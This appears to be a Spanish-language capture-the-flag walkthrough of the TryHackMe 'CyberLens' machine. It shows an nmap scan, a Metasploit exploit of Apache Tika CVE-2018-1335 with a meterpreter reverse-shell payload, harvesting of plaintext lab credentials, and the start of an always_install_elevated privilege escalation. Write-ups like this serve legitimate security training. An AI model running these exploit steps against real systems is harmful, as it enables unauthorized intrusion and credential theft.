CiberLente(msfconsole )
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-13T23:58:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-01-12T23:55:48
|_Not valid after: 2025-07-14T23:55:48
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2025-01-13T23:58:18+00:00
3885/tcp filtered topflow-ssl
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
10051/tcp filtered zabbix-trapper
13293/tcp filtered unknown
16781/tcp filtered unknown
23181/tcp filtered unknown
30693/tcp filtered unknown
37566/tcp filtered unknown
41450/tcp filtered unknown
46886/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47451/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
52425/tcp filtered unknown
55206/tcp filtered unknown
55326/tcp filtered unknown
61777/tcp open http Jetty 8.y.z-SNAPSHOT
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/plain).
|_http-cors: HEAD GET
61912/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-01-13T23:58:21
|_ start_date: N/A
Entramos al http que esta en el puerto 61777
Busacmos un exploit.
┌──(docker㉿docker)-[~/try]
└─$ searchsploit tika
---------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Joomla! Component com_cartikads 1.0 - Arbitrary File Upload | php/webapps/10984.txt
Mitra Informatika Solusindo cart - SQL Injection | php/webapps/5214.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(docker㉿docker)-[~/try]
└─$ searchsploit -m windows/remote/47208.rb
Exploit: Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
URL: https://www.exploit-db.com/exploits/47208
Path: /usr/share/exploitdb/exploits/windows/remote/47208.rb
Codes: CVE-2018-1335
Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/docker/try/47208.rb
┌──(docker㉿docker)-[~/try]
└─$ ls
47208.rb LasMarco.ovpn gobuster.out nmap-trickster.txt
┌──(docker㉿docker)-[~/try]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.4.38-dev ]
+ -- --=[ 2466 exploits - 1273 auxiliary - 393 post ]
+ -- --=[ 1475 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search tika
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
1 post/linux/gather/puppet . normal No Puppet Config Gather
2 auxiliary/scanner/http/wp_gimedia_library_file_read . normal No WordPress GI-Media Library Plugin Directory Traversal Vulnerability
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options
Configuramos las opciones LHOST, RHOSTy RPORT.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.9.3.32
LHOST => 10.9.3.32
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run
meterpreter > shell
Process 4696 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd C:\Users\cyberlens\Desktop
cd C:\Users\cyberlens\Desktop
type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
C:\Users\CyberLens\Desktop>
Escalada
Usando tree /f, enumeramos el sistema de archivos del usuario y encontramos sus credenciales en C:\Users\CyblerLens.
El comando tree /f enumera archivos en ese directorio
C:\Users\CyberLens\Desktop> tree /f
tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
EC2 Feedback.website
EC2 Microsoft Windows Guide.website
user.txt
No subfolders exist
C:\Users\CyberLens\Desktop>cd..
cd..
C:\Users\CyberLens>tree /f
tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
����3D Objects
����Contacts
����Desktop
� EC2 Feedback.website
� EC2 Microsoft Windows Guide.website
� user.txt
�
����Documents
� ����Management
� CyberLens-Management.txt
�
����Downloads
����Favorites
� � Bing.url
� �
� ����Links
����Links
� Desktop.lnk
� Downloads.lnk
�
����Music
����Pictures
����Saved Games
����Searches
����Videos
Se encontro el siguiente archivo: CyberLens-Management.txtC:\Users\CyberLens>type Documents\Management\Cyberlens-Management.txt
type Documents\Management\Cyberlens-Management.txt
Remember, manual enumeration is often key in an engagement ;)
CyberLens
HackSmarter123
C:\Users\CyberLens>
Ahora ecalada:
msf6 exploit(windows/local/always_install_elevated) > show options
Module options (exploit/windows/local/always_install_elevated):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
Last updated